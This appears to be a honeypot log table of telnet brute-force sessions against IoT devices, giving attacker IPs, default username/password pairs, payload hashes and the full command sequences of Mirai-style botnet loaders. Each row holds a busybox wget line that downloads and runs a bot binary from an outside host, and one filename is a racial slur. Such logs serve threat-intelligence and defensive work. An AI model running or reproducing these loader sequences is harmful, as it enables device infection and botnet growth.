| IP address |
User name |
Password |
SHA256 of the payload file |
 195.62.53.38
| root | changeme | f4cbc78c8f98782d7c958a14972272307b89d745b35c6f29064eafa6ddcbd228 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf v5lol apophis
/bin/busybox cp /bin/busybox v5lol; >v5lol; /bin/busybox chmod 777 v5lol; /bin/busybox APEP
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox APEP
/bin/busybox wget; /bin/busybox tftp; /bin/busybox APEP
/bin/busybox wget http://195.62.53.38:80/lx/apep.spc -O - > v5lol; /bin/busybox chmod 777 v5lol; /bin/busybox APEP
./v5lol load.wget; /bin/busybox JNO
/bin/busybox rm -rf apophis; >v5lol; /bin/busybox APEP |
 142.93.103.77
| default | | 2afa51b661eb1056d225bec3f2efb286c8a63a5d3cd87e9565e6d3a67f950521 |
enable
system
linuxshell
shell
sh
>/tmp/.misa && cd /tmp/
>/var/.misa && cd /var/
>/dev/.misa && cd /dev/
>/mnt/.misa && cd /mnt/
>/var/run/.misa && cd /var/run/
>/var/tmp/.misa && cd /var/tmp/
>/.misa && cd /
>/dev/netslink/.misa && cd /dev/netslink/
>/dev/shm/.misa && cd /dev/shm/
>/bin/.misa && cd /bin/
>/etc/.misa && cd /etc/
>/boot/.misa && cd /boot/
>/usr/.misa && cd /usr/
/bin/busybox rm -rf HOHO-U79OL HOHO-9Y8G6
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://142.93.103.77:80/bins/hoho.m68k -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL Telnet; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6; >HOHO-U79OL; /bin/busybox HOHO |
142.93.242.150 | telnet | telnet | ec78537a4ed8299d2fb351f3093fb693c829e9b82317e7bb415d3c2740883a5c |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://142.93.242.150:80/bins/sora.sh4 -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.sh4; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA |
195.62.53.38 | admin | 1234 | f4cbc78c8f98782d7c958a14972272307b89d745b35c6f29064eafa6ddcbd228 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf v5lol apophis
/bin/busybox cp /bin/busybox v5lol; >v5lol; /bin/busybox chmod 777 v5lol; /bin/busybox APEP
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox APEP
/bin/busybox wget; /bin/busybox tftp; /bin/busybox APEP
/bin/busybox wget http://195.62.53.38:80/lx/apep.spc -O - > v5lol; /bin/busybox chmod 777 v5lol; /bin/busybox APEP
./v5lol load.wget; /bin/busybox JNO
/bin/busybox rm -rf apophis; >v5lol; /bin/busybox APEP |
 68.183.68.114
| default | default | cfa13a3d2bf368ec7ef7b90a68746b0ec38f86c1c28563f6a2cb68511b48beb2 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://68.183.68.114:80/bins/sora.spc -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.spc; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA |
 80.211.113.47
| root | password | 8f5eeb56f92e6c9699e29b623dc4e5713e061616c1e7e76d83000d3d24107446 |
enable
shell
sh
/bin/busybox OWARI
/bin/busybox ps; /bin/busybox OWARI
/bin/busybox cat /proc/mounts; /bin/busybox OWARI
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox OWARI
cd /
/bin/busybox cp /bin/echo X19I239124UIU; >X19I239124UIU; /bin/busybox chmod 777 X19I239124UIU; /bin/busybox OWARI
/bin/busybox cat /bin/echo
/bin/busybox OWARI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox OWARI
/bin/busybox wget http://xoticstresser.net:80/orion.mips -O - > X19I239124UIU; /bin/busybox chmod 777 X19I239124UIU; /bin/busybox OWARI
./X19I239124UIU telnet.mips.wget; /bin/busybox IRAWO
rm -rf 289JU3414U891; > X19I239124UIU; /bin/busybox OWARI |
206.189.66.170 | default | OxhlwSG8 | 2aa897f3913a25383f314816d57f34ff0f2b5c1264db8d6a06e5a40fd531d8b8 |
enable
system
linuxshell
shell
sh
>/tmp/.misa && cd /tmp/
>/var/.misa && cd /var/
>/dev/.misa && cd /dev/
>/mnt/.misa && cd /mnt/
>/var/run/.misa && cd /var/run/
>/var/tmp/.misa && cd /var/tmp/
>/.misa && cd /
>/dev/netslink/.misa && cd /dev/netslink/
>/dev/shm/.misa && cd /dev/shm/
>/bin/.misa && cd /bin/
>/etc/.misa && cd /etc/
>/boot/.misa && cd /boot/
>/usr/.misa && cd /usr/
/bin/busybox rm -rf HOHO-U79OL HOHO-9Y8G6
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HOHO
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://206.189.66.170:80/bins/hoho.arm -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL telnet; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6 HOHO-U79OL
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://206.189.66.170:80/bins/hoho.arm7 -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL telnet; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6; >HOHO-U79OL; /bin/busybox HOHO |
142.93.103.77 | user | user | d36e10ee454f9f473ef9c206fc878a8c44e9a5b1e852c79d1210823d82469bc8 |
enable
system
linuxshell
shell
sh
>/tmp/.misa && cd /tmp/
>/var/.misa && cd /var/
>/dev/.misa && cd /dev/
>/mnt/.misa && cd /mnt/
>/var/run/.misa && cd /var/run/
>/var/tmp/.misa && cd /var/tmp/
>/.misa && cd /
>/dev/netslink/.misa && cd /dev/netslink/
>/dev/shm/.misa && cd /dev/shm/
>/bin/.misa && cd /bin/
>/etc/.misa && cd /etc/
>/boot/.misa && cd /boot/
>/usr/.misa && cd /usr/
/bin/busybox rm -rf HOHO-U79OL HOHO-9Y8G6
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://142.93.103.77:80/bins/hoho.ppc -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL Telnet; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6; >HOHO-U79OL; /bin/busybox HOHO |